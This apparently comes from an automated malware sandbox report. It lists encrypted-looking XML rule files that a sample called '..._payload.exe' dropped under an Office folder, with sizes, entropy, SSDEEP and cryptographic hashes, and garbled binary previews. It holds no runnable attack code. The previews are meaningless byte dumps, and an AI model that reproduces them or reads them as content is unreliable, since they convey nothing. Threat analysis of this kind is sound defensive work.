                                                                                                                                                                      Preview:.<?...~..Xv4.1.....*.4..y.j...@*.........q.;..qS.]..U.Yq..I7.....&p.u.'..}....y....$..t=..*.....2.W......&.h..0B.#...t..;..[,8z...-&......._._'....#.E9u.hv.....}n.?..k.\.....~[.lW._l.E)Q.n+w....Y......{"s...B.$..2.e...K.B.s..,..c]W.K+..+i.....=w.}..>.!.=.Y..EHd.s@...j.*.+.x<.....E...}W..{.4I.o.rg.3..)#..5...(<.~.h.I.+....@.kc<.bz..o...Z.....>=.xp.T.t.(..GR..)V.<\.(../..%6.@|O#....Hv..W.8..f.t....z....6\Q..{e..C..f.st.#.g.......I'q.8.....)..HM..n.^.n..~..Q........T.)<.B.|..9.7.FK.G$.M.....fO........B...hL.A.Q....Y.R..%..i`..zJ-..\...p..Q.......'Jk....b.....)..r>l5_..r...W3......'.W..?h.......'9.O9.............O....;./..qpj...i.$oQ.N.B..>...c..S}gf.r.g:..C.%n...{zUyu.=..^/... 0.5..o....Sr;@ce&.0..$.T;.K...DT.Ht..B..Pn.Z...>...?..a..ohCG.f..sv.....?.^.!.8.[.....b.c*.Z.....X......Q>...-....ck.iy...gl..{....E.-..".....i.... .P.Dw..........$.........2<^..)7.i.........-..t..9.z...&.....Jgi...a.>...@...!.1..\}..)........&i.5...k.'.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703651v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                      Entropy (8bit):7.868449978607283
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:xOqJQ/Lf8fzuPfsamqeFb6wEtSLCCdPPSbYpXDjnD:xF4f8fnalgbQImQSbYl
                                                                                                                                                                      MD5:FDD46AB32393CDF7C91D674AAC815E02
                                                                                                                                                                      SHA1:B1B967ABC104568739D7AC08CC8F4DE2A4FDC112
                                                                                                                                                                      SHA-256:B2985290BB9AA58B2950200F5B17B73D00678E792F857975F69555C15FAC480B
                                                                                                                                                                      SHA-512:B81D0A9021A0B83DA359C6CC3B7443A62B17611613A07C2C1831250EE97EBC44AA7EAAA00CEC3C57200BF557D9F2E8C4BE4A21C613870025E24DB0BB51F1DE56
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.+.]..W...nb..].u....9G.q..!.s>.N.....g.zp...7. ....X.....|;!...7Is.....5.K..u...N........V....k...}R6E.LQ(.5..U...s}0.(..3..."..[.....5.7ae.Z...%.b ...D%..+..X.2....?..@....H....... ..z.!....p/l........(..........J.........y3b..V&.V..B.,D....;...<..R...0.A..q....Pm...LzvlZ..Q..,.j.Z.;.X.....s....ex.{.o..Kt....]......m/p.. eK..E.Ra.....+Z.....{..u\.H..$Wb...~....4.U.{,=.A.@U...IR.(DO.k.[.E.o....<Jt"..b................u!..._u.V$.Ht..:./k...qKu{/.&....r1f. 8.FlM..KE..>u3...C....&L.C...}YU.Ul../W~.R..$..S.q..............7"....|...]j.p.H...E."k....`C.9_..*CQ.g....V.....<.#.../.{:w.E.4$.\:$X=.....~..\|B.1...V...k..`D.J..>.:.}..o...t..P9!..u"o.}..S..{%..fe!...PQ9.^y.0..z...I&.?&...n..........Z.i.lh..l..;.(!..n...&.i.......v....u}....r..!..Dn...M.)Q.I.u..X..~..P.HA....L.q..1D....e........-..].|...\f.e:..L0.e7.io.....GL..G@i..[.,.'..y../9. Q..b.z.5^9o....y]".-.o.d!jY....l.1.:...].n..........SB./......`.@!....9%`....$T._s.....<...U......=.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703700v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1712
                                                                                                                                                                      Entropy (8bit):7.885727154054591
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:m+5Ir4GbS6dTXf/KA5gwcz3P5qyPgCNMW5+FpuD:qr416dTl5RcddgeMW5+FpW
                                                                                                                                                                      MD5:5E97FE3C0A19C8E12B4D55E2AF5A6F38
                                                                                                                                                                      SHA1:6138DEE32695157F947449D6C62477C7D0642F26
                                                                                                                                                                      SHA-256:BD1B59B35BE8418BCDD026B2CFD836FB92324F461E2F099A444EECC66E9325B3
                                                                                                                                                                      SHA-512:2FC1A53F562FCB51C00960CB790A5997A71DB4883AD1A8B882D87714DF73D18EC6169F48DF3A5C615F40C8F9181C570080A3BF1B1E0605769F78071FDDAFDB62
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..N.G .........B.s....P..N@..2....|.._}.HB9...I..e,.>....Y;]_(o~...D......4/`K.7.a..?.0..Yx....K....u.........x.s+x'}.8.T...j*....L1...6!!........V.......ez".....4_.....H.K(./.q.7m.D...\....^%?..5..|..Ft7..Z..lp.....3.....%*..>......v}icE.F.j'.A.=.....EG....vQSh(...1.<Cg...n.t.....A.....q.....v...G.....x28T...uI.&.........Em........'...t..,.....:...&,Ze\...7T......JN..,........b..........7...L.P.f.W.5......N. .....k=.L....!....wb...x.oCe....J..'.m.(il~.w.&.._z.h..7...X.L..9.l@..~J..w.=.7.....5/..`z0...\...[[u...O..0.:.r..J9&.;d.z.G.p.z.lF..F......#.&."...........x.%.?......}2..K..'Vsa.l....=X"6.@.....R7i=."i..uE.1.~G./....I4R....).#A...O....=.%..h...>od!........)I...0..3.......L_.*Jr..N...L...^|w<r."N....q+g=..|t{.Z.....9....i.....7.....].V~:...$7.y.%......V.J....&...7....u.......f.....Nzg.K...A..gB.9.....k..F..f...V...7}...)s,1.7.,..I^T......9S7!.1~.Z.%4_.s..#..s....:{.S._pdE.5.....noK.M.O.....M"l..u5....fm.u....%..C...G...V.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703701v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1749
                                                                                                                                                                      Entropy (8bit):7.887524237158718
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0fBodUuxwhQRw0yEAtLvcFXNa2fhFF92sdPop0nqluHelxRw+uRF2CGpI8ha2MIU:ioFnwLEpX7fBJ60LHelkXFuYP7D
                                                                                                                                                                      MD5:39F479462475D173A464B384A4553F4E
                                                                                                                                                                      SHA1:4C89CAB437BB000021E2A1120E2DC8BBFA42EBFB
                                                                                                                                                                      SHA-256:4898BF377171DAC93B5CC1DFC2161D2BD2D71D79825C92DEE14638B2F99DA715
                                                                                                                                                                      SHA-512:C9052B730391779B2BB79B463F8A36146FF16D1868A46F90928CA2492F0749946682AEB8170A406AD8184D31654DE9CF2FD50664928F4E6D8D626E3BA7250A22
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.g.'u...Lox$..M.ah(d...2.)N.JI..:[B8..~.....M...y....n.k.b.@&.Xno..g.>.\.F.8_.I.%.DwR.....U...5F.&. .Gel7'.^.'...<i.V.z'......U.P.......Ing)...M..^....P..1....a....OTA..O......oC.{...U(.SS(.H....s....\.'...D...Vr..T.E)..?d.8.hwINL.3.M...7.fP.[...1.L.?_.....+....:+<......C.1z...nS~..5A}.,NV......vl..$..vj..Ag.0.B..}..|.A......U......|.C. O.7B...%D....px..4.H...........V6a.5.!..R3m.V.EZ.R/..~.DW9...~...3x.+...%U....'...U....o.$.Y...}.+...'.1)......6 .....(Y}.zy.(..'..y..C..........!.V.'....B...&W.C}|5."AT.y.K...4..F8......k.5.......a.?Z. .......1?s#..}q>U..[m..yJz.4.nQH.....!.SK../.ol...\..?........o.K.....,.-.D+z{....g.s....&>.O.n....H.u.7....%.!...G.d<..Y....A..zTj..Pp._..u.......X...U..i}.mF..h.&ft....(S.#.7p.....6[..9"~.;.....U.P..S.:..8.ib.|.}5-Q`./.....J.G.J...J...>V^.C7...p...&.....M..g....A...R.3...S...(./bjT...0.vZ...<........%.@..Z).."c)..aN....p.=...=....{{sE0......u.#...*|_....=gT....d..].........T....#....Y.J..N_Y..^..w

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703750v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.90488061671628
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ZC6Vdex9FaxFcavTs7OvDe9rQIO667tSAvBPjfZmshq66RbVkoqI/KiOAdo2bD:Ewdex9Fa0ETzs/DI7BP7hpoxhqdAdbD
                                                                                                                                                                      MD5:1E115B9672884274A0A4B0D4404531F1
                                                                                                                                                                      SHA1:07CC67AAC2A39112ADBC2815E4C0AB9159E2CCCC
                                                                                                                                                                      SHA-256:C346703934582BE77E6E5EDEFBDF096DE42B37447747BC6768F75BC341278817
                                                                                                                                                                      SHA-512:047894F083693261D0C1523C868539A71725244C897A42E9FBD944DD315327F3998015D25D6012E55B699C34FAF687533B22222A59601384FDDB62F159576940
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?R%..[.e.P..G.2..Qkw.yh..Pn= W.....}2....X..Eq`L.f...$.&D.W.I....]...@_..=OG...;..sd....'....,(....7...e....j;..0...^c..U.2v.....zu.Q. ...[-3..w+5.V..(........1._.....u2..20&8.....D.p^....1.....f.P.x3N..'RL..k....lQq5.2.... #..........ej....4'..,k!.Q,!6@\h....>..q..<a..........d'...F...K..ZE49W.#.l.,.?M@..~t..X....u..6.}..!?.&m..=..k_.%.>)x......I.9w.:"%...t=..9..sj.G.....JN:I!.v....I.F.$......W..AU...'.&..HA.`..Y.G\X......-...4./z 7....6.p.Fb....G\sg&1...^Ja~1......./..#~I&...k...6.....F.."...oX[.5....L..p.M.&...=i...W.(.Q......>...W...r..d.H...:z....^.`Cb.;Ykc*.l....P.G....'.a.P.m...9..lh;.......Q5k....i..L.Yg..PU'8..-O"_...~...g.!.t.`kzH....{#..;..l....y...z.oMI....Y#UBH60..4.dN.0...c....%.|......*.KA....SE~...y.[u=a.<.......r..y..(.V.e.}...).P..'"..>U:r:g..E.Q.........NO...XG@R........@j...$X6.-.......9*1q^...... G.D...y.I.I.\K..o............:...m..fi.....?../.4.b*LB.9..\.l... .._.....H:.Q@.7.oX....P!N;q....-&a3.....v=U.G)n]...a..]&

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703751v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1771
                                                                                                                                                                      Entropy (8bit):7.882418307221418
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:+COD76N4chzt8LDQlvHfp6eWemKFkkWYc1E6vCbJQcv/D:+LDYfhhKrXqkkpdJNBvr
                                                                                                                                                                      MD5:C3FCDD4952059C374E334CA948855E6C
                                                                                                                                                                      SHA1:A5026690A53951965AA63DDD1F4E5554753F2CF7
                                                                                                                                                                      SHA-256:B70923ACEE080FA022928AC7EEA4162EE968A0165D26D9637075658626F52B05
                                                                                                                                                                      SHA-512:F5C6E4E599799ED69493C1240174E4625251834FE153F0B3C42405B5DFF9AACC808923C266E2A497E4AB53AEAC49D72268FCE112F136C2ED81B6868D8A285175
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..P....4...9I.f.i......x..F....&.# .;*.Z...zaGUQ.....wX..e..35.H.......Sv...._.....w....}.`.)...._..~.+32../-......A...O .W...=.....D....&!.V.t..#.X/.B..bK.8.&.Sl0...?[`..`F.}O...;pY....w............@.$.J.qt.h..]....I=1caO..}....E[.H.F.X..LL.P"....k......YF.0....=k.....<>!G.9..ef.%E...]G.....X...D.o..........&.tJ.oi...pK....Z...~..a....^....9....{V,+.(.......A...'.T.1.G..'...6...+Q...P..h...Z.u..o.:&.b.D._2B....9.C......=.B.....H)...n..g..o..O.!,.....=.p...P~..*..>...2zU(n.....c...K.>..E....:}4..lH..4.Hl@..s.fWC...,5Bz.B.F.i}.7r._....{evc....:s...yY.}N[.c# =3A..m{aA...OJ..s....+.QY..X9..`....!.......K...b.F...2.....o.!..O...:.HJ....E.k.'.f.1.m"...Y...A-...6p......q....5(.aN..M}.`.=k-.....X.....,.Bw..(....9...|..z..^.e....t..|\Za.B..>.^.dv..\8.h.R.5F.u.}......G...7.?.........v...Q?....E.D..z.....'..FQ.*..k....UB.#...j...1.G......@Q..?.:...... ]HUy 6.F!o.oS.... | 1P.0p..L.J..y.ue...TYj.v..?...._..E^.Z..Y...x-+.J.:...V.._...S....@x.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703800v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.880508772180938
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ZjoB7LW5okclRRNTL6yyDaREw0wbKB7VFJS9HOpWmQ1upQD:ZiA0lRRBL6yy3wcqSTC
                                                                                                                                                                      MD5:780365CCBE888C2BAAA2E901AFA3D2A4
                                                                                                                                                                      SHA1:E25A2C4F99D521EC3E4FF8746A9CF14B7D3969EA
                                                                                                                                                                      SHA-256:DDF4A832C43EF64EFAFEC44C8D92DFD54F0D3C2985E04DCB7D783C1629B9835B
                                                                                                                                                                      SHA-512:48D160E2838A88612D085AE589A5BFA3B715D6F54A3567DAAF7A76F58D7B1F3A46F13849AB0FD0BB4C76D22E3CA7CB65AFF9A2B18CB8532E5B8D18C50B2E2FAF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.R...T...3.!M.5.;\....0.DH...../.CO....]...\>..T"4..-..;=*....T)..T....vZ4.Z4.k....hdD.pU..WY.y.E.......[[<.1.X..?.E.<.[Od)[..s.'..{F..fc{.d.d+......<BMmt. 'L..D..Aw...4&..1....7mR.....7l......Dt7?.s.e.!..}.sB....d.p..y\..:...<.f..vlig.p9-...d......^[j.#(....*..W..t..-~...aQ..4.;.`{..fYo..|G..V?LY.k...<z0.z...W?m.......9..+N.`......P.(..n.2..A.7on..i...U...xY)."C3Q...).).K.....7(..MR..4..........k...;%...U.../.M[.S.O...]..z...._u].. Z.^....,........f1......8.K.-..e..A8.ybV.... J+i[..t.2.l..yUl......-.,lMks.`.x..{y....$i-......s.#`iT..e../..5.P.`.=f.R...m.......Y...;....f3..4..a...S.?.l?.]Ss.a....v..~.=..._..).(..?...E:y..W.}....t.......x.B.@N.eu...B............C...:.94h.K.|M..%.|....4.....Q!.....rR.2Sr....:.....%".H.\...#....G.....+\..2..lE...N.gtA4g+F.....x...L..q.]..9b..(.p.Va..|...C..r&.<.^.:....C...(..L.U...<^B\.;.#j.e..).9.I..|...+#.kH...e.;...P.>.F..9R.......w*...{>1....7V..l\.......?.."...I{.,..(.....#df...w......q...pl.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703801v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                      Entropy (8bit):7.880928391469872
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:DzoUmswHWbNyfgtuDTmDNlkl9uwzK2tnfRLD:Ahsw2JyfgtHzkdNfB
                                                                                                                                                                      MD5:CCC5DD7B8371284DD58E450DAF4249EE
                                                                                                                                                                      SHA1:66CBA7C072334A1C371B3EDF2BC6BB806088FD06
                                                                                                                                                                      SHA-256:604C0A2870802BF84B16C2B0AAAC5B84C3E5A592E17617A94F09DD7257F00449
                                                                                                                                                                      SHA-512:59F920E47FDC7D5A94F016C205E722A3494565C44DA4E521FA3FEAB6B82AD4405020581CCA653B6B713AA4BC46B83816B0E0AC198E2B657ED9DACD83F408CEDD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..!....$.'.w.e....2?..vJ...+FJ..P..]....`...2%zL.......B..B}.wr.@.s6..f..)....RxF.t.>5.+.le..H0..E.k...i}.....Y>..}w./xH.-..<u.z.]rY0..U5;..%....-...I.`.y(..qa.....,...e...s.x...f.... ..&..K.7.v..\..}...#uA..he)..>T~.9.G>Y....r.".Z2......A..%.8i......<...4...h.M,.}.}...Q.m.x?.-)......_.i.^..*.l.s4...D..@_./U.T8.g]...O)...#bkQ?.1-...>g.".v......U."..+.....Z..B.U..O.xa..L...).@..r.I...2..K..E..d.. f.9......9..P.Z.V{.N.R... .G.....7'...B?.4.......+.(-M./i...".....$..,.;$....4=.8".x.7.........L..c.q]... h.9..;a...#6..K../.8.W.}..+D....2H..........Rkv\.3......s..C..%)y/`.oD.....DO.]..0..0.v6....X.V?.ni..n'QM}.LY....39.hQ..v..B7...T......{.._>..8.v.d)....}e..x.8IdR3..l_.....95:..J.C...gp.U.NMIH.P..D..`g.Z..lm.d.}a.H.L`..F..{Dz....C....m.B..6.n.....\<31..).{uB.....N....s.q=v.VH...a..:.I%c.;..^.IF.$..h..8...$....l.?...x4.b.w.#.@...71..4....Rw..X.....nz>&..-.......X. ..q.A...n]......2.7.5.y*K.....&..#...J..8.._~.X.............#..PE[.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703850v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.8806817733771375
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2J2h23A/Ks2jg7Izk2pJd9InLPc0wJP9DupAD:W2g3JscGEkmJAznwJs+
                                                                                                                                                                      MD5:F4162CE5FDB0B1075662B15C50876079
                                                                                                                                                                      SHA1:8FB35F78D7B09A925182D4EB09B7D9014EA3922C
                                                                                                                                                                      SHA-256:74E7B7FF7AE3A9E8785AB23AB46557A6BCF15360932E603C09C4C13E2400D138
                                                                                                                                                                      SHA-512:96C3E72DEA3CE8AD3E7A03A05914BB12DB8ACE481D95B3335144C0718683D815F8335FAD61F03D1EEFD14075263584E2B18F76F14DCFACEE0131041B1C6B2FC9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?;.W..k.u...n..mv..A..../.[0..{.......T..~.>%.'UN....{..+...q.[.........%,.>.Ff...m...,..ERc.!Tn...{..R....@...xS(kh..kXjF...x8*.ugG..q.u.k.[t.{k%B,..]dU#0....onR.l1:..{.E.|.Ae.KK..f.&.}.....?..?.=.RRz.1....%*....._...5n..~lv....=."X.}a.\.L..k..Y_.o%...1i..Ao.W...........g..|..0..Y_[..K.4W..5[...?v./1.V'...KFY.=\!.(.q"....1.).'C)..1.+.W.a.:x}.s...i.P.H.T..}5..M..B..nk.v.\.$..Etb.6..C.L..7E.......cW.".S....-c.....j. .I.V,.\.d....L].W.jb..8..J3.B...2l'.h.5.;.Y.!....l}.....S...t0..h.../QL...q......'...S4.....p....|.>...e`.}.H.4)..\E..'.E.Q.I..3...._{vj.."....k<uI...\...G....d7.5U#...OUz.."nQ!.=W....\].QY\Ivk......R.z?.2..T....jn.....jL!..........e...kk.i*.n../...tD...#n.._.%4z..'O............ .}.[.lC_"k&.jP.3.m}xS.....P.m=0...@.o.X.gm>.PW*7.........>..6..fG....-....E..4zg.=.I..X.P0..J...s......f_.....f&.~.......y..Y.*..fn"....?.N.ft.pU....`k....U........T&..W..UStGC.........U7....5v.N.W....~.c..wJw.."^.......9..>..A....R..f.....g.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703851v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1776
                                                                                                                                                                      Entropy (8bit):7.889484756893435
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:0VBLRo/BaD2qxWcTphYPhCXOA++1df3+I0Hpd+mm0D:0VNS/Baiw12Y+B+1px0Hh
                                                                                                                                                                      MD5:8A183C694140774B81EA3C6C4717D4E7
                                                                                                                                                                      SHA1:F9376A3C017AD2D62A1AB80C34B6E95EB929C743
                                                                                                                                                                      SHA-256:F0112048018786FD5CCDAC9E434D5544C6037C024EA396032C845553C4B96C8F
                                                                                                                                                                      SHA-512:A114216B216BD00590FBAE11C48C0298D9E375A37BAEED0AA6F10909F9C7EEF3805D3E85A8AAFB19F7718030F6C1A5FE0D47B88A6A78DAB2ACE400C522D2F2EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...,F.:%i....../..j.-.K.T..P....pDaq..[.`..KP...%s...x?.0..Fp.wW....Yx..-n.B....ja...\..|..M?.._.._.b..X.y...rnXQ..Vu|B..BK.Q.....=.........O......F.=..S......\.._...W.?.>.'.3G....=ZPoE...q.D.P>7S.......!.)..<+.s.?.<.v..s.Dk..Wd.\.#@s)....j.h...(.5..N .v\h..b+....q.z..(.t...4..NMO...n.a..|n..d.PL.........W.P...c....`..{Z..B.....w...1q.../....^..O5!|f...n...j ...4..e..2..H.T....j......YN.J.W....WG..6.Q.L..s>..L8j...c.GN.O./....7..S.G..EK...,..S.......=;..`tS}...`....y...........IzbF.']..M........t._).Y}^....B.I.....E..m0.|*.t..|.{.e.j......n..^.e..Q-oW3.<...z...Q.(y.".&...!.}..5..yo"....:..@{e~..z Q[*.C(.;q).t......>...S....Z:a;..2..2.K..k$.+.km......%.h.?'*.1C..@...K....:.S..:........"&.u..I.<E|.Lh.}S....8....S.r....3.).Yar0...o.L..Z%...4.K.d.5d.=hRG..t.G...s....,....[i.u.f...{.[{S....8.?...d....Ni.,.'. .; K7.3,'.X0...O.......a.."..N..V..*.4.%.X.AC.7.....kt\8..a..m.F.L*u...J........FC.t...-c..p.?.B..a)`.....B-..N{,....yo.BH.....G.r.....A..!h.E

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703900v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1724
                                                                                                                                                                      Entropy (8bit):7.897144346268341
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:T7vW2tlwlW2kwCxuUMtZ3c0u8PfC6GCRD:3vWWlH2e1MfcDufxZ
                                                                                                                                                                      MD5:AE4A813F1BBAB8530EED76EB69556B8B
                                                                                                                                                                      SHA1:203695D6FDA8614B66E3E10FB6F0802F0AAD1997
                                                                                                                                                                      SHA-256:1E9DC338E772009C645DDBD09CE898E0A1585B7422E1A398E07B24CE159B629F
                                                                                                                                                                      SHA-512:1D15BAB1E76F73D6D6B28DD592BB2261C4C4FCEB2178F6CD5B46280F0E2B32DDA12A2B8FBE99FA5337ECEAF4B50D2668C68B9A019DC88F09A119C81DAFF48210
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?,..c.S...e.6l..p..'~q...~>......X......HW..P.v1..S.....]D ;.......jQ...)./.VKV{.{;..g..y4.S.OUll...M....#.4..9...3........L....^,.........qv..t......`+.o..5 _.V..]O..$........YL.j.G..t7.S..T.B.....'..JW..MI..y..H2p..jBN.DzX"..N)#....*....9s....@+..}..R.{.n......A...Jc...p/i.X..uWh..26VP.0.`hV[.s.GJ.q.I..3.[a....H..T@...Z.c.......... *g...,..m....'.."..y......).9..M...G..!...y..M..gy..C.m..x+.%c2?Q.0...x....|wBP..=l.g;J.......5....5q......w..d.......S.*6\...p-Z!....U.e...9J....e.w.0..(C............N..f..3..l.2..4..J10t.j..r......."...Z.....(w....=...C..........BU....,...cN..;..[.fs&.+....L.....8..J.....YX-.Q......G...}D.....E..j..Q..,.......8....._PN6..(N...xA..C<.`.ma........9.']L.O...Jz....zuMK:+.A.".H].'>.....>\s.M........?k.7Rx.6..|......J......./Ig...A..z...... .F..|.L..u3y...2...$ W......x.7/..O... .<.&-.8....w.Y.........M.Sz..1..'..a.G....55..|.)c....gx..#.,=&..,.....@.0.c.`h....$Z.B.iT..@5..........t........Q..R..WR.6r.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703901v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1761
                                                                                                                                                                      Entropy (8bit):7.89833648425744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Jl5MoxQwyG4LE7RkUJKMJZOTETArFADgenPJnD:XvxKGD7RRJBVMrCUehD
                                                                                                                                                                      MD5:D2E74CCF702AAC293AD77653C93370D9
                                                                                                                                                                      SHA1:756D55F37D8C6E3CBDAB22FC40946609DDFF0C5D
                                                                                                                                                                      SHA-256:81605E29623834DFC3A7394C9F82422AE2F0A66018990AD72A4A11F387783275
                                                                                                                                                                      SHA-512:CAC927E71EE36DC1D6D0CA73BD05633445DBD54C230B0E5E4493E1C0761DD51F5C76B9145096116BFCFC2E82B1FC8CDC50D374CFD100BA879FFA73F94B335E3B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?:~~&...i.(d.. X.e.J...\'iz].8y.-.[...RkRz..G.".@.L...d...0.u.Z..*+6..|.!%..;.s..x.."......p.a.].M+.\@...^+.L/..df... ._%.)....3...I.P.....n}g.......Q.x.3<..............h.............d..9..C...7 }|+.4e.. .dM..b.../a.w....i....m....C.....m........?....B?......*..a.m.b.....,.....{s....v.X..Ye."..H..sYs..U.....@V...".....=...Hj@'...T-...3N......-..fQ.MU=cN=x..*.0z. ....G.20.3,..%.#z.XcC&..QY...AHEF...hfpH~.....)\....!..&O..0..nGf..,E...e.....(}.#....e..e..q/E....2..>..*.C..nF.^.th ...._!.w.....j..8..WtS.q}p2.G.T~Z7. ~J#B....L9.....Pl.V........<../ ..[{.'.Q.|Bm.Fu...HZ@...J?...,a!!..7l..}.WV......(t.....y..S.T.P...Ei.X.bGr.Et..k.CG.].C..CO`_G2..R6C$y.|D.I..R...;.z.]...uP..7.|N.6...l.xV|.Y.....XZ........~c!L......x...yp..sD....f..NT.VQ....s..........D:.'...-[....]..My...5..Q..........d......);..3.=.....Q#D.`C.....0.n...'@...d#.......z....X..[.g).k=.q.y..0..e..6:...F-V.B.K...."..*.@(:E.K...[.Va.w.D......p..x.)t.h..X|......mam.3...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703950v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1700
                                                                                                                                                                      Entropy (8bit):7.878346030380866
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fsob3WG6Kofx9PyKYu3NmWto04XTmujwgFTtmZKo0EONydP3x5otbHrKUixVz2bD:R4K8xNyluK0swghtmkHEFP4rrKUG6D
                                                                                                                                                                      MD5:5E74CE67D78A7A7EB3DD9769C0053092
                                                                                                                                                                      SHA1:2D2F59E7A45C0CB6BB2B01050F981A999F423709
                                                                                                                                                                      SHA-256:7EAEF993BDFF727616CCD0C5F63D21B29CD678E8D8F3E20CF5742EE00010757E
                                                                                                                                                                      SHA-512:9B4CAD26839744024DB3967E56EDAF25D6D6BBD4DD6DA1236A24A858046253E0612DC800F270CE8A9489722AC582D2CD21C9638B89CC1B1215C02DC5F49B2DD9
                                                                                                                                                                      Malicious:false
